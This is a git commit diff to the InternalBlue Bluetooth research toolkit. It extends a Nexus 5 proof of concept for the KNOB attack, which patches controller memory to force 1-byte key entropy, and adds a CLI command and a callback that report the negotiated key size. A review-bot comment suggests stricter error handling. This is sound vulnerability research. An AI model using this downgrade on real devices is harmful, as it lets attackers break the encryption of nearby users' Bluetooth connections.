
new nexus5 knob poc with automatic callback

jiska2342 committed Sep 28, 2019
1 parent 6d3eb20 commit 9d9b98ce71ae2337810703ace04f62d3a5732599
Showing with 70 additions and 9 deletions.
  1. +59 −7 examples/nexus5/KNOB_PoC.py
  2. +10 −2 internalblue/cmds.py
  3. +1 −0 requirements.txt
@@ -5,6 +5,10 @@

from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int



@@ -19,8 +23,8 @@
"""


internalblue = ADBCore(serial=False)
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device

# setup sockets
if not internalblue.connect():
@@ -38,11 +42,59 @@
internalblue.writeMem(0x203797, '\x01') # global key entropy


internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, you can open the regular InternalBlue cli with diagnostic mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n")
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0c\n"
"...shows the key size of handle 0x000c.\n")


class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."

parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)

parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")

def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True


def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return

if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))

return


# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)


# enter CLI
cli.commandLoop(internalblue)
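Review bot: The error branch of hciKnobCallback (L74-L91) only recognises status 0x12, so any other non-zero Command Complete status for Read_Encryption_Key_Size (a wrong handle presumably yields a different code, e.g. 0x02 Unknown Connection Identifier) falls into the success branch and prints whatever bytes follow as handle and key size, and a response shorter than seven bytes raises inside the callback from `u16(hcipkt.data[4:6])` / `hcipkt.data[6]`. Treat every non-zero status as a failure and check the length before unpacking. Since the PoC forces 1-byte entropy via the writeMem at L37, the printed key size is the actual verdict; it is worth flagging values below 7 octets (the minimum the Bluetooth SIG recommends after KNOB) explicitly rather than leaving the reader to remember the threshold. The registration via `cmd.CmdKnob = CmdKnob` at L95 assumes the CLI discovers commands by scanning module attributes, which cannot be confirmed from this hunk.
```python
    if hcipkt.event_code == 0x0e and len(hcipkt.data) >= 4 and u16(hcipkt.data[1:3]) == 0x1408:
        status = u8(hcipkt.data[3])
        if status != 0x00:  # e.g. 0x12 Invalid HCI Command Parameters, 0x02 Unknown Connection Identifier
            log.info("Read Encryption Key Size failed (status 0x%02x).\n"
                     " - Did you already negotiate an encrypted connection?\n"
                     " - Did you choose the correct connection handle?\n" % status)
        elif len(hcipkt.data) >= 7:
            hnd, key_size = u16(hcipkt.data[4:6]), u8(hcipkt.data[6])
            log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (hnd, key_size))
            if key_size < 7:
                log.warning("Key size of %d octet(s) is below the 7-octet minimum recommended after KNOB" % key_size)
        else:
            log.info("Truncated Read Encryption Key Size response: %r" % hcipkt.data)
```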
@@ -1622,10 +1622,18 @@ class CmdSendDiagCmd(Cmd):
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--type", type=auto_int, default=0x07,
help="Type. Default is 0x07, but you can use 0x02 for ACL and 0x03 for SCO."
"Other values might crash.")
parser.add_argument("data", nargs="*",
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), Get Memory Dump (f3), Packet Test (f6).")
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). "
"Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), "
"Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), "
"Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), "
"Get Memory Dump (f3), Packet Test (f6).")

def work(self):

args = self.getArgs()
if not args or not args.data:
return True
@@ -1637,7 +1645,7 @@ def work(self):
else:
data += data_part.decode('hex')

self.internalblue.sendH4(0x07, data)
self.internalblue.sendH4(args.type, data)

return True

@@ -1 +1,2 @@
pwntools==3.12.2
pyelftools==0.24
